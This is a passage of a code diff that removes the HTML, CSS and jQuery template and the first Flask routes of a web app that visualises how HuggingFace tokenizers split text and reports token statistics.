- text-align: center;
804
- line-height: 16px;
805
- font-size: 12px;
806
- cursor: pointer;
807
- transition: all 0.2s ease;
808
- }
809
-
810
- .file-detach:hover {
811
- background-color: rgba(255, 0, 0, 0.2);
812
- color: #ff6b6b;
813
- transform: scale(1.1);
814
- }
815
-
816
- .preview-notice {
817
- background-color: #273c56;
818
- border: 1px solid #365a82;
819
- color: #89b4e8;
820
- padding: 0.75rem;
821
- border-radius: 0.5rem;
822
- margin-top: 1rem;
823
- font-size: 0.875rem;
824
- display: none;
825
- }
826
-
827
- .custom-model-wrapper {
828
- position: relative;
829
- }
830
-
831
- .model-badge {
832
- position: absolute;
833
- top: -10px;
834
- right: -5px;
835
- background: linear-gradient(135deg, #22c55e 0%, #15803d 100%);
836
- color: white;
837
- font-size: 0.7rem;
838
- font-weight: 700;
839
- padding: 0.25rem 0.5rem;
840
- border-radius: 999px;
841
- transform: scale(0);
842
- transition: transform 0.3s cubic-bezier(0.175, 0.885, 0.32, 1.275);
843
- box-shadow: 0 2px 5px rgba(0, 0, 0, 0.2);
844
- z-index: 10;
845
- }
846
-
847
- .model-badge.show {
848
- transform: scale(1);
849
- }
850
-
851
- .custom-model-help {
852
- display: inline-block;
853
- width: 16px;
854
- height: 16px;
855
- line-height: 16px;
856
- font-size: 11px;
857
- font-weight: bold;
858
- text-align: center;
859
- background-color: var(--secondary-text);
860
- color: var(--card-bg);
861
- border-radius: 50%;
862
- margin-left: 5px;
863
- cursor: help;
864
- vertical-align: middle;
865
- }
866
-
867
- .tooltip {
868
- position: absolute;
869
- top: 100%;
870
- left: 0;
871
- width: 280px;
872
- background-color: #333;
873
- color: #fff;
874
- padding: 0.75rem;
875
- border-radius: 0.5rem;
876
- font-size: 0.8rem;
877
- margin-top: 0.5rem;
878
- z-index: 100;
879
- box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
880
- opacity: 0;
881
- visibility: hidden;
882
- transition: opacity 0.2s, visibility 0.2s;
883
- }
884
-
885
- .custom-model-help:hover + .tooltip {
886
- opacity: 1;
887
- visibility: visible;
888
- }
889
-
890
- /* Tokenizer info icon and tooltip styles */
891
- .tokenizer-info-icon {
892
- display: inline-flex;
893
- align-items: center;
894
- justify-content: center;
895
- width: 24px;
896
- height: 24px;
897
- background: linear-gradient(135deg, var(--primary-color) 0%, var(--primary-hover) 100%);
898
- color: white;
899
- border-radius: 50%;
900
- position: absolute;
901
- left: -32px; /* Position to the left of the selector */
902
- top: 50%;
903
- transform: translateY(-50%);
904
- cursor: pointer;
905
- font-size: 12px;
906
- font-weight: bold;
907
- transition: all 0.2s ease;
908
- z-index: 10;
909
- box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
910
- }
911
-
912
- .tokenizer-info-icon:hover {
913
- transform: translateY(-50%) scale(1.1);
914
- box-shadow: 0 3px 8px rgba(0, 0, 0, 0.3);
915
- }
916
-
917
- /* Watermark styles */
918
- .watermark {
919
- position: fixed;
920
- bottom: 20px;
921
- right: 20px;
922
- color: var(--primary-color);
923
- font-size: 1.4rem;
924
- font-weight: 700;
925
- opacity: 0.25; /* Semi-transparent */
926
- z-index: 100;
927
- transition: opacity 0.3s ease;
928
- text-decoration: none;
929
- pointer-events: auto; /* Ensure it remains clickable */
930
- }
931
-
932
- .watermark:hover {
933
- opacity: 0.6; /* Increase opacity on hover */
934
- }
935
-
936
- .tokenizer-info-tooltip {
937
- position: absolute;
938
- top: calc(100% + 8px);
939
- left: -30px; /* Adjust position to align with the icon */
940
- width: 300px;
941
- background-color: var(--card-bg);
942
- color: var(--text-color);
943
- border: 1px solid var(--primary-color);
944
- border-radius: 0.75rem;
945
- box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);
946
- padding: 1rem;
947
- z-index: 1000; /* Increase z-index to ensure visibility */
948
- opacity: 0;
949
- visibility: hidden;
950
- transition: opacity 0.3s, visibility 0.3s;
951
- pointer-events: none; /* Initially disable pointer events */
952
- }
953
-
954
- .tokenizer-info-icon:not(.tooltip-disabled):hover + .tokenizer-info-tooltip {
955
- opacity: 1;
956
- visibility: visible;
957
- pointer-events: auto;
958
- }
959
-
960
- .tokenizer-info-tooltip:hover {
961
- opacity: 1;
962
- visibility: visible;
963
- pointer-events: auto;
964
- }
965
-
966
- .tokenizer-info-header {
967
- font-size: 1.1rem;
968
- font-weight: 600;
969
- margin-bottom: 0.5rem;
970
- padding-bottom: 0.5rem;
971
- border-bottom: 1px solid rgba(255, 255, 255, 0.1);
972
- color: var(--primary-color);
973
- }
974
-
975
- .tokenizer-info-grid {
976
- display: grid;
977
- grid-template-columns: repeat(2, 1fr);
978
- gap: 0.75rem;
979
- margin: 0.75rem 0;
980
- }
981
-
982
- .tokenizer-info-item {
983
- display: flex;
984
- flex-direction: column;
985
- }
986
-
987
- .tokenizer-info-label {
988
- font-size: 0.75rem;
989
- color: var(--secondary-text);
990
- margin-bottom: 0.25rem;
991
- }
992
-
993
- .tokenizer-info-value {
994
- font-size: 0.95rem;
995
- font-weight: 500;
996
- }
997
-
998
- .special-tokens-container {
999
- margin-top: 0.75rem;
1000
- background-color: rgba(15, 79, 155, 0.1);
1001
- border-radius: 0.5rem;
1002
- padding: 0.5rem;
1003
- max-height: 100px;
1004
- overflow-y: auto;
1005
- }
1006
-
1007
- .special-token-item {
1008
- display: flex;
1009
- justify-content: space-between;
1010
- margin-bottom: 0.25rem;
1011
- font-size: 0.8rem;
1012
- }
1013
-
1014
- .token-name {
1015
- color: var(--secondary-text);
1016
- }
1017
-
1018
- .token-value {
1019
- background-color: rgba(255, 255, 255, 0.1);
1020
- padding: 1px 4px;
1021
- border-radius: 2px;
1022
- font-family: monospace;
1023
- }
1024
-
1025
- .tokenizer-info-loading {
1026
- display: flex;
1027
- justify-content: center;
1028
- align-items: center;
1029
- height: 100px;
1030
- }
1031
-
1032
- .tokenizer-info-spinner {
1033
- width: 30px;
1034
- height: 30px;
1035
- border: 3px solid var(--primary-color);
1036
- border-radius: 50%;
1037
- border-top-color: transparent;
1038
- animation: spin 1s linear infinite;
1039
- }
1040
-
1041
- .tokenizer-info-error {
1042
- color: #f87171;
1043
- font-size: 0.9rem;
1044
- text-align: center;
1045
- padding: 1rem;
1046
- }
1047
-
1048
- @media (max-width: 768px) {
1049
- .header {
1050
- flex-direction: column;
1051
- align-items: stretch;
1052
- gap: 1rem;
1053
- }
1054
-
1055
- .model-selector {
1056
- width: 100%;
1057
- }
1058
-
1059
- .stats-grid {
1060
- grid-template-columns: 1fr;
1061
- }
1062
-
1063
- .tokenizer-info-tooltip {
1064
- width: 250px;
1065
- }
1066
- }
1067
- </style>
1068
- </head>
1069
- <body>
1070
- <!-- Hidden File Drop Zone that appears when dragging files -->
1071
- <div id="fileDropZone" class="file-drop-zone">
1072
- <div class="drop-indicator">
1073
- <div class="file-icon">📄</div>
1074
- <p>Drop your file here</p>
1075
- </div>
1076
- </div>
1077
-
1078
- <!-- File upload icon in bottom left corner -->
1079
- <div id="fileUploadIcon" class="file-upload-icon">
1080
- <span>📎</span>
1081
- </div>
1082
- <p class="file-info" id="fileInfo"></p>
1083
-
1084
- <div class="container">
1085
- <div class="header">
1086
- <div class="title-section">
1087
- <h1 class="title">Token Visualizer</h1>
1088
- <p class="subtitle">Advanced tokenization analysis and visualization</p>
1089
- </div>
1090
- <div class="model-selector">
1091
- <div class="model-selector-header">
1092
- <div class="model-type-toggle">
1093
- <div class="toggle-option predefined-toggle active" data-type="predefined">Predefined</div>
1094
- <div class="toggle-option custom-toggle" data-type="custom">Custom</div>
1095
- </div>
1096
- </div>
1097
- <div id="predefinedModelSelector">
1098
- <div style="position: relative;">
1099
- <div class="tokenizer-info-icon" id="modelInfoIcon" title="View tokenizer information">ℹ</div>
1100
- <!-- TOOLTIP MOVED HERE -->
1101
- <div class="tokenizer-info-tooltip" id="modelInfoTooltip">
1102
- <div id="tokenizerInfoContent">
1103
- <div class="tokenizer-info-loading">
1104
- <div class="tokenizer-info-spinner"></div>
1105
- </div>
1106
- </div>
1107
- </div>
1108
- <!-- SELECT NOW COMES AFTER ICON AND TOOLTIP -->
1109
- <select id="modelSelect" name="model">
1110
- {% for model_id, info in models.items() %}
1111
- <option value="{{ model_id }}" {% if selected_model == model_id %}selected{% endif %}>
1112
- {{ info.alias }}
1113
- </option>
1114
- {% endfor %}
1115
- </select>
1116
- </div>
1117
- </div>
1118
- <div id="customModelSelector" style="display: none;" class="custom-model-wrapper">
1119
- <div style="position: relative;">
1120
- <div class="tokenizer-info-icon" id="customModelInfoIcon" title="View tokenizer information">ℹ</div>
1121
- <div class="tokenizer-info-tooltip" id="customModelInfoTooltip">
1122
- <div id="customTokenizerInfoContent">
1123
- <div class="tokenizer-info-loading">
1124
- <div class="tokenizer-info-spinner"></div>
1125
- </div>
1126
- </div>
1127
- </div>
1128
- <input type="text" id="customModelInput" class="custom-model-input"
1129
- placeholder="Enter HuggingFace model path"
1130
- value="{{ custom_model if custom_model and custom_model|length > 0 else '' }}">
1131
- </div>
1132
- <span class="custom-model-help">?</span>
1133
- <div class="tooltip">
1134
- Enter a valid HuggingFace model ID (e.g., "mistralai/Mistral-7B-Instruct-v0.3")
1135
- The model must have a tokenizer available and must be not restricted. (with some exceptions)
1136
- Also some models have restrictions. You can use mirrored versions, like unsloth to omit that.
1137
- Like ("unsloth/Meta-Llama-3.1-8B-Instruct-bnb-4bit") instead of original path.
1138
- </div>
1139
- <div class="model-badge" id="modelSuccessBadge">Loaded</div>
1140
- </div>
1141
- </div>
1142
- </div>
1143
-
1144
- <div class="error-message" id="errorMessage">{{ error }}</div>
1145
-
1146
- <div class="input-section">
1147
- <form id="analyzeForm" method="POST" enctype="multipart/form-data">
1148
- <textarea name="text" id="textInput" placeholder="Enter text to analyze or upload a file in bottom left corner...">{{ text }}</textarea>
1149
- <input type="hidden" name="model" id="modelInput" value="{{ selected_model }}">
1150
- <input type="hidden" name="custom_model" id="customModelInputHidden" value="{{ custom_model if custom_model else '' }}">
1151
- <input type="hidden" name="model_type" id="modelTypeInput" value="{{ model_type if model_type else 'predefined' }}">
1152
- <input type="file" name="file" id="fileInput" style="display: none;">
1153
- <div class="button-container">
1154
- <button type="submit" id="analyzeButton">Analyze Text</button>
1155
- </div>
1156
- </form>
1157
- </div>
1158
-
1159
- <div id="results" class="results" {% if not token_data %}style="display: none;"{% endif %}>
1160
- <div class="card">
1161
- <h2 class="card-title">Token Visualization</h2>
1162
- <div class="preview-notice" id="previewNotice">
1163
- Note: Showing preview of first 8096 characters. Stats are calculated on the full file.
1164
- </div>
1165
- <div class="token-container" id="tokenContainer">
1166
- {% if token_data %}
1167
- {% for token in token_data.tokens %}
1168
- <span class="token"
1169
- style="background-color: {{ token.colors.background }}; color: {{ token.colors.text }};"
1170
- title="Original token: {{ token.original }} | Token ID: {{ token.token_id }}">
1171
- {{ token.display }}
1172
- </span>
1173
- {% if token.newline %}<br>{% endif %}
1174
- {% endfor %}
1175
- {% endif %}
1176
- </div>
1177
- <button class="expand-button" id="expandButton">Show More</button>
1178
- <div class="display-limit-notice" id="displayLimitNotice">
1179
- Note: Only showing first 50,000 tokens. Total token count: <span id="totalTokenCount">0</span>
1180
- </div>
1181
- </div>
1182
-
1183
- <div class="stats-grid">
1184
- <div class="stat-card">
1185
- <div class="stat-title">Total Tokens</div>
1186
- <div class="stat-value" id="totalTokens">{{ token_data.stats.basic_stats.total_tokens if token_data else 0 }}</div>
1187
- <div class="stat-description">
1188
- <span id="uniqueTokens">{{ token_data.stats.basic_stats.unique_tokens if token_data else 0 }} unique</span>
1189
- (<span id="uniquePercentage">{{ token_data.stats.basic_stats.unique_percentage if token_data else 0 }}</span>%)
1190
- </div>
1191
- </div>
1192
- <div class="stat-card">
1193
- <div class="stat-title">Token Types</div>
1194
- <div class="stat-value" id="specialTokens">{{ token_data.stats.basic_stats.special_tokens if token_data else 0 }}</div>
1195
- <div class="stat-description">special tokens</div>
1196
- </div>
1197
- <div class="stat-card">
1198
- <div class="stat-title">Whitespace</div>
1199
- <div class="stat-value" id="spaceTokens">{{ token_data.stats.basic_stats.space_tokens if token_data else 0 }}</div>
1200
- <div class="stat-description">
1201
- spaces: <span id="spaceCount">{{ token_data.stats.basic_stats.space_tokens if token_data else 0 }}</span>,
1202
- newlines: <span id="newlineCount">{{ token_data.stats.basic_stats.newline_tokens if token_data else 0 }}</span>
1203
- </div>
1204
- </div>
1205
- <div class="stat-card">
1206
- <div class="stat-title">Token Length</div>
1207
- <div class="stat-value" id="avgLength">{{ token_data.stats.length_stats.avg_length if token_data else 0 }}</div>
1208
- <div class="stat-description">
1209
- median: <span id="medianLength">{{ token_data.stats.length_stats.median_length if token_data else 0 }}</span>,
1210
- ±<span id="stdDev">{{ token_data.stats.length_stats.std_dev if token_data else 0 }}</span> std
1211
- </div>
1212
- </div>
1213
- <div class="stat-card">
1214
- <div class="stat-title">Compression</div>
1215
- <div class="stat-value" id="compressionRatio">{{ token_data.stats.basic_stats.compression_ratio if token_data else 0 }}</div>
1216
- <div class="stat-description">characters per token</div>
1217
- </div>
1218
- </div>
1219
- </div>
1220
- </div>
1221
- <a href="https://huggingface.co/spaces/bartar/tokenizers" target="_blank" class="watermark">
1222
- @bartar/tokenizers
1223
- </a>
1224
-
1225
- <script>
1226
- $(document).ready(function() {
1227
- // File handling variables
1228
- let currentFile = null;
1229
- let originalTextContent = null;
1230
- let lastUploadedFileName = null;
1231
- let fileJustUploaded = false; // Flag to prevent immediate detachment
1232
- let currentModelType = "{{ model_type if model_type else 'predefined' }}";
1233
- let currentTokenizerInfo = null;
1234
-
1235
- // Try to parse tokenizer info if available from server
1236
- try {
1237
- currentTokenizerInfo = {{ token_data.tokenizer_info|tojson if token_data and token_data.tokenizer_info else 'null' }};
1238
- if (currentTokenizerInfo) {
1239
- updateTokenizerInfoDisplay(currentTokenizerInfo, currentModelType === 'custom');
1240
- }
1241
- } catch(e) {
1242
- console.error("Error parsing tokenizer info:", e);
1243
- }
1244
-
1245
- // Show error if exists
1246
- if ("{{ error }}".length > 0) {
1247
- showError("{{ error }}");
1248
- }
1249
-
1250
- // Setup model type based on initial state
1251
- if (currentModelType === "custom") {
1252
- $('.toggle-option').removeClass('active');
1253
- $('.custom-toggle').addClass('active');
1254
- $('#predefinedModelSelector').hide();
1255
- $('#customModelSelector').show();
1256
- }
1257
-
1258
- // Show success badge if custom model loaded successfully
1259
- if (currentModelType === "custom" && !("{{ error }}".length > 0)) {
1260
- $('#modelSuccessBadge').addClass('show');
1261
- setTimeout(() => {
1262
- $('#modelSuccessBadge').removeClass('show');
1263
- }, 3000);
1264
- }
1265
-
1266
- // Toggle between predefined and custom model inputs
1267
- $('.toggle-option').click(function() {
1268
- const modelType = $(this).data('type');
1269
- $('.toggle-option').removeClass('active');
1270
- $(this).addClass('active');
1271
- currentModelType = modelType;
1272
-
1273
- if (modelType === 'predefined') {
1274
- $('#predefinedModelSelector').show();
1275
- $('#customModelSelector').hide();
1276
- $('#modelTypeInput').val('predefined');
1277
- // Set the model input value to the selected predefined model
1278
- $('#modelInput').val($('#modelSelect').val());
1279
- } else {
1280
- $('#predefinedModelSelector').hide();
1281
- $('#customModelSelector').show();
1282
- $('#modelTypeInput').val('custom');
1283
- }
1284
-
1285
- // Clear tokenizer info if switching models
1286
- if (modelType === 'predefined') {
1287
- $('#tokenizerInfoContent').html('<div class="tokenizer-info-loading"><div class="tokenizer-info-spinner"></div></div>');
1288
- fetchTokenizerInfo($('#modelSelect').val(), false);
1289
- } else {
1290
- $('#customTokenizerInfoContent').html('<div class="tokenizer-info-loading"><div class="tokenizer-info-spinner"></div></div>');
1291
- // Only fetch if there's a custom model value
1292
- const customModel = $('#customModelInput').val();
1293
- if (customModel) {
1294
- fetchTokenizerInfo(customModel, true);
1295
- }
1296
- }
1297
- });
1298
-
1299
- // Update hidden input when custom model input changes
1300
- $('#customModelInput').on('input', function() {
1301
- $('#customModelInputHidden').val($(this).val());
1302
- });
1303
-
1304
- function showError(message) {
1305
- const errorDiv = $('#errorMessage');
1306
- errorDiv.text(message);
1307
- errorDiv.show();
1308
- setTimeout(() => errorDiv.fadeOut(), 5000);
1309
- }
1310
-
1311
- // Function to update tokenizer info display in tooltip
1312
- function updateTokenizerInfoDisplay(info, isCustom = false) {
1313
- const targetSelector = isCustom ? '#customTokenizerInfoContent' : '#tokenizerInfoContent';
1314
- let htmlContent = '';
1315
-
1316
-
1317
- if (info.error) {
1318
- $(targetSelector).html(`<div class="tokenizer-info-error">${info.error}</div>`);
1319
- return;
1320
- }
1321
-
1322
- // Start building the tooltip content
1323
- htmlContent = `<div class="tokenizer-info-header">Tokenizer Details</div>
1324
- <div class="tokenizer-info-grid">`;
1325
-
1326
- // Dictionary size
1327
- if (info.vocab_size) {
1328
- htmlContent += `
1329
- <div class="tokenizer-info-item">
1330
- <span class="tokenizer-info-label">Dictionary Size</span>
1331
- <span class="tokenizer-info-value">${info.vocab_size.toLocaleString()}</span>
1332
- </div>`;
1333
- }
1334
-
1335
- // Tokenizer type
1336
- if (info.tokenizer_type) {
1337
- htmlContent += `
1338
- <div class="tokenizer-info-item">
1339
- <span class="tokenizer-info-label">Tokenizer Type</span>
1340
- <span class="tokenizer-info-value">${info.tokenizer_type}</span>
1341
- </div>`;
1342
- }
1343
-
1344
-
1345
- // Max length
1346
- if (info.model_max_length) {
1347
- htmlContent += `
1348
- <div class="tokenizer-info-item">
1349
- <span class="tokenizer-info-label">Max Length</span>
1350
- <span class="tokenizer-info-value">${info.model_max_length.toLocaleString()}</span>
1351
- </div>`;
1352
- }
1353
-
1354
- htmlContent += `</div>`; // Close tokenizer-info-grid
1355
-
1356
- // Special tokens section
1357
- if (info.special_tokens && Object.keys(info.special_tokens).length > 0) {
1358
- htmlContent += `
1359
- <div class="tokenizer-info-item" style="margin-top: 0.75rem;">
1360
- <span class="tokenizer-info-label">Special Tokens</span>
1361
- <div class="special-tokens-container">`;
1362
-
1363
- // Add each special token with proper escaping for HTML special characters
1364
- for (const [tokenName, tokenValue] of Object.entries(info.special_tokens)) {
1365
- // Properly escape HTML special characters
1366
- const escapedValue = tokenValue
1367
- .replace(/&/g, '&amp;')
1368
- .replace(/</g, '&lt;')
1369
- .replace(/>/g, '&gt;')
1370
- .replace(/"/g, '&quot;')
1371
- .replace(/'/g, '&#039;');
1372
-
1373
- htmlContent += `
1374
- <div class="special-token-item">
1375
- <span class="token-name">${tokenName}:</span>
1376
- <span class="token-value">${escapedValue}</span>
1377
- </div>`;
1378
- }
1379
-
1380
- htmlContent += `
1381
- </div>
1382
- </div>`;
1383
- }
1384
-
1385
- $(targetSelector).html(htmlContent);
1386
- }
1387
-
1388
- // Function to fetch tokenizer info
1389
- function fetchTokenizerInfo(modelId, isCustom = false) {
1390
- if (!modelId) return;
1391
-
1392
- const targetSelector = isCustom ? '#customTokenizerInfoContent' : '#tokenizerInfoContent';
1393
- $(targetSelector).html('<div class="tokenizer-info-loading"><div class="tokenizer-info-spinner"></div></div>');
1394
-
1395
- $.ajax({
1396
- url: '/tokenizer-info',
1397
- method: 'GET',
1398
- data: {
1399
- model_id: modelId,
1400
- is_custom: isCustom
1401
- },
1402
- success: function(response) {
1403
- if (response.error) {
1404
- $(targetSelector).html(`<div class="tokenizer-info-error">${response.error}</div>`);
1405
- } else {
1406
- currentTokenizerInfo = response;
1407
- updateTokenizerInfoDisplay(response, isCustom);
1408
- }
1409
- },
1410
- error: function(xhr) {
1411
- $(targetSelector).html('<div class="tokenizer-info-error">Failed to load tokenizer information</div>');
1412
- }
1413
- });
1414
- }
1415
-
1416
- function updateResults(data) {
1417
- $('#results').show();
1418
-
1419
- // Update tokens
1420
- const tokenContainer = $('#tokenContainer');
1421
- tokenContainer.empty();
1422
- data.tokens.forEach(token => {
1423
- const span = $('<span>')
1424
- .addClass('token')
1425
- .css({
1426
- 'background-color': token.colors.background,
1427
- 'color': token.colors.text
1428
- })
1429
- // Include token id in the tooltip on hover
1430
- .attr('title', `Original token: ${token.original} | Token ID: ${token.token_id}`)
1431
- .text(token.display);
1432
-
1433
- tokenContainer.append(span);
1434
- if (token.newline) {
1435
- tokenContainer.append('<br>');
1436
- }
1437
- });
1438
-
1439
- // Update display limit notice
1440
- if (data.display_limit_reached) {
1441
- $('#displayLimitNotice').show();
1442
- $('#totalTokenCount').text(data.total_tokens);
1443
- } else {
1444
- $('#displayLimitNotice').hide();
1445
- }
1446
-
1447
- // Update preview notice
1448
- if (data.preview_only) {
1449
- $('#previewNotice').show();
1450
- } else {
1451
- $('#previewNotice').hide();
1452
- }
1453
-
1454
- // Update basic stats
1455
- $('#totalTokens').text(data.stats.basic_stats.total_tokens);
1456
- $('#uniqueTokens').text(`${data.stats.basic_stats.unique_tokens} unique`);
1457
- $('#uniquePercentage').text(data.stats.basic_stats.unique_percentage);
1458
- $('#specialTokens').text(data.stats.basic_stats.special_tokens);
1459
- $('#spaceTokens').text(data.stats.basic_stats.space_tokens);
1460
- $('#spaceCount').text(data.stats.basic_stats.space_tokens);
1461
- $('#newlineCount').text(data.stats.basic_stats.newline_tokens);
1462
- $('#compressionRatio').text(data.stats.basic_stats.compression_ratio);
1463
-
1464
- // Update length stats
1465
- $('#avgLength').text(data.stats.length_stats.avg_length);
1466
- $('#medianLength').text(data.stats.length_stats.median_length);
1467
- $('#stdDev').text(data.stats.length_stats.std_dev);
1468
-
1469
- // Update tokenizer info if available
1470
- if (data.tokenizer_info) {
1471
- currentTokenizerInfo = data.tokenizer_info;
1472
- updateTokenizerInfoDisplay(data.tokenizer_info, currentModelType === 'custom');
1473
- }
1474
- }
1475
-
1476
- // Handle text changes to detach file
1477
- $('#textInput').on('input', function() {
1478
- // Skip if file was just uploaded (prevents immediate detachment)
1479
- if (fileJustUploaded) {
1480
- fileJustUploaded = false;
1481
- return;
1482
- }
1483
-
1484
- const currentText = $(this).val();
1485
- const fileInput = document.getElementById('fileInput');
1486
-
1487
- // Only detach if a file exists and text has been substantially modified
1488
- if (fileInput.files.length > 0 && originalTextContent !== null) {
1489
- // Check if the text is completely different or has been significantly changed
1490
- // This allows for small edits without detaching
1491
- const isMajorChange =
1492
- currentText.length < originalTextContent.length * 0.8 || // Text reduced by at least 20%
1493
- (currentText.length > 0 &&
1494
- currentText !== originalTextContent.substring(0, currentText.length) &&
1495
- currentText.substring(0, Math.min(20, currentText.length)) !==
1496
- originalTextContent.substring(0, Math.min(20, currentText.length)));
1497
-
1498
- if (isMajorChange) {
1499
- detachFile();
1500
- }
1501
- }
1502
- });
1503
-
1504
- // Function to detach file
1505
- function detachFile() {
1506
- // Clear the file input
1507
- $('#fileInput').val('');
1508
- // Hide file info
1509
- $('#fileInfo').fadeOut(300);
1510
- // Reset the original content tracker
1511
- originalTextContent = $('#textInput').val();
1512
- // Reset last uploaded filename
1513
- lastUploadedFileName = null;
1514
- }
1515
-
1516
- // For model changes
1517
- $('#modelSelect').change(function() {
1518
- const selectedModel = $(this).val();
1519
- $('#modelInput').val(selectedModel);
1520
-
1521
- // Fetch tokenizer info for the selected model
1522
- fetchTokenizerInfo(selectedModel, false);
1523
-
1524
- // If text exists, submit the form
1525
- if ($('#textInput').val().trim()) {
1526
- $('#analyzeForm').submit();
1527
- }
1528
- });
1529
-
1530
- // File drop handling
1531
- const fileDropZone = $('#fileDropZone');
1532
- const fileUploadIcon = $('#fileUploadIcon');
1533
-
1534
- // Prevent default drag behaviors
1535
- ['dragenter', 'dragover', 'dragleave', 'drop'].forEach(eventName => {
1536
- fileDropZone[0].addEventListener(eventName, preventDefaults, false);
1537
- document.body.addEventListener(eventName, preventDefaults, false);
1538
- });
1539
-
1540
- function preventDefaults(e) {
1541
- e.preventDefault();
1542
- e.stopPropagation();
1543
- }
1544
-
1545
- // Show drop zone when file is dragged over the document
1546
- document.addEventListener('dragenter', showDropZone, false);
1547
- document.addEventListener('dragover', showDropZone, false);
1548
-
1549
- fileDropZone[0].addEventListener('dragleave', hideDropZone, false);
1550
- fileDropZone[0].addEventListener('drop', hideDropZone, false);
1551
-
1552
- function showDropZone(e) {
1553
- fileDropZone.addClass('active');
1554
- }
1555
-
1556
- function hideDropZone() {
1557
- fileDropZone.removeClass('active');
1558
- }
1559
-
1560
- // Handle dropped files
1561
- fileDropZone[0].addEventListener('drop', handleDrop, false);
1562
-
1563
- function handleDrop(e) {
1564
- const dt = e.dataTransfer;
1565
- const files = dt.files;
1566
- handleFiles(files);
1567
- }
1568
-
1569
- // Also handle file selection via click on the icon
1570
- fileUploadIcon.on('click', function() {
1571
- const input = document.createElement('input');
1572
- input.type = 'file';
1573
- input.onchange = e => {
1574
- handleFiles(e.target.files);
1575
- };
1576
- input.click();
1577
- });
1578
-
1579
- function handleFiles(files) {
1580
- if (files.length) {
1581
- const file = files[0];
1582
- currentFile = file;
1583
- lastUploadedFileName = file.name;
1584
- fileJustUploaded = true; // Set flag to prevent immediate detachment
1585
-
1586
- // Show file info with animation and add detach button
1587
- $('#fileInfo').html(`${file.name} (${formatFileSize(file.size)}) <span class="file-detach" id="fileDetach"><i class="fas fa-times"></i></span>`).fadeIn(300);
1588
-
1589
- // Add click handler for detach button
1590
- $('#fileDetach').on('click', function(e) {
1591
- e.stopPropagation(); // Prevent event bubbling
1592
- detachFile();
1593
- return false;
1594
- });
1595
-
1596
- // Set the file to the file input
1597
- const dataTransfer = new DataTransfer();
1598
- dataTransfer.items.add(file);
1599
- document.getElementById('fileInput').files = dataTransfer.files;
1600
-
1601
- // Preview in textarea (first 8096 chars)
1602
- const reader = new FileReader();
1603
- reader.onload = function(e) {
1604
- const previewText = e.target.result.slice(0, 8096);
1605
- $('#textInput').val(previewText);
1606
-
1607
- // Store this as the original content AFTER setting the value
1608
- // to prevent the input event from firing and detaching immediately
1609
- setTimeout(() => {
1610
- originalTextContent = previewText;
1611
- // Automatically submit for analysis
1612
- $('#analyzeForm').submit();
1613
- }, 50);
1614
- };
1615
- reader.readAsText(file);
1616
- }
1617
- }
1618
-
1619
- function formatFileSize(bytes) {
1620
- if (bytes < 1024) return bytes + ' bytes';
1621
- else if (bytes < 1048576) return (bytes / 1024).toFixed(1) + ' KB';
1622
- else return (bytes / 1048576).toFixed(1) + ' MB';
1623
- }
1624
-
1625
- // Make sure to check if there's still a file when analyzing
1626
- $('#analyzeForm').on('submit', function(e) {
1627
- e.preventDefault();
1628
-
1629
- // Skip detachment check if file was just uploaded
1630
- if (!fileJustUploaded) {
1631
- // Check if text has been changed but file is still attached
1632
- const textInput = $('#textInput').val();
1633
- const fileInput = document.getElementById('fileInput');
1634
-
1635
- if (fileInput.files.length > 0 &&
1636
- originalTextContent !== null &&
1637
- textInput !== originalTextContent &&
1638
- textInput.length < originalTextContent.length * 0.8) {
1639
- // Text was significantly changed but file is still attached, detach it
1640
- detachFile();
1641
- }
1642
- } else {
1643
- // Reset flag after first submission
1644
- fileJustUploaded = false;
1645
- }
1646
-
1647
- // Update the hidden inputs based on current model type
1648
- if (currentModelType === 'custom') {
1649
- $('#customModelInputHidden').val($('#customModelInput').val());
1650
- } else {
1651
- $('#modelInput').val($('#modelSelect').val());
1652
- }
1653
-
1654
- const formData = new FormData(this);
1655
- $('#analyzeButton').prop('disabled', true);
1656
-
1657
- $.ajax({
1658
- url: '/',
1659
- method: 'POST',
1660
- data: formData,
1661
- processData: false,
1662
- contentType: false,
1663
- success: function(response) {
1664
- if (response.error) {
1665
- showError(response.error);
1666
- } else {
1667
- updateResults(response);
1668
-
1669
- // Show success badge if custom model
1670
- if (currentModelType === 'custom') {
1671
- $('#modelSuccessBadge').addClass('show');
1672
- setTimeout(() => {
1673
- $('#modelSuccessBadge').removeClass('show');
1674
- }, 3000);
1675
- }
1676
- }
1677
- },
1678
- error: function(xhr) {
1679
- showError(xhr.responseText || 'An error occurred while processing the text');
1680
- },
1681
- complete: function() {
1682
- $('#analyzeButton').prop('disabled', false);
1683
- }
1684
- });
1685
- });
1686
-
1687
- $('#expandButton').click(function() {
1688
- const container = $('#tokenContainer');
1689
- const isExpanded = container.hasClass('expanded');
1690
-
1691
- container.toggleClass('expanded');
1692
- $(this).text(isExpanded ? 'Show More' : 'Show Less');
1693
- });
1694
-
1695
- // Initialize tokenizer info for current model
1696
- if (currentModelType === 'predefined') {
1697
- fetchTokenizerInfo($('#modelSelect').val(), false);
1698
- } else if ($('#customModelInput').val()) {
1699
- fetchTokenizerInfo($('#customModelInput').val(), true);
1700
- }
1701
-
1702
- // Add event listener for custom model input
1703
- $('#customModelInput').on('change', function() {
1704
- const modelValue = $(this).val();
1705
- if (modelValue) {
1706
- fetchTokenizerInfo(modelValue, true);
1707
- }
1708
- });
1709
- });
1710
- </script>
1711
- </body>
1712
- </html>
1713
- """
1714
-
1715
- @app.route('/tokenizer-info', methods=['GET'])
1716
- def tokenizer_info():
1717
- """
1718
- Endpoint to get tokenizer information without processing text.
1719
- """
1720
- model_id = request.args.get('model_id', '')
1721
- is_custom = request.args.get('is_custom', 'false').lower() == 'true'
1722
-
1723
- if not model_id:
1724
- return jsonify({"error": "No model ID provided"}), 400
1725
-
1726
- try:
1727
- # For predefined models, use the model name from the dictionary
1728
- if not is_custom and model_id in TOKENIZER_MODELS:
1729
- model_id_or_name = model_id
1730
- else:
1731
- # For custom models, use the model ID directly
1732
- model_id_or_name = model_id
1733
-
1734
- # Load the tokenizer and get info
1735
- tokenizer, info, error = load_tokenizer(model_id_or_name)
1736
-
1737
- if error:
1738
- return jsonify({"error": error}), 400
1739
-
1740
- return jsonify(info)
1741
- except Exception as e:
1742
- return jsonify({"error": f"Failed to get tokenizer info: {str(e)}"}), 500
1743
-
1744
- @app.route('/', methods=['GET', 'POST'])
1745
- def index():
1746
- text = ""
1747
- token_data = None
1748
- error_message = ""
1749
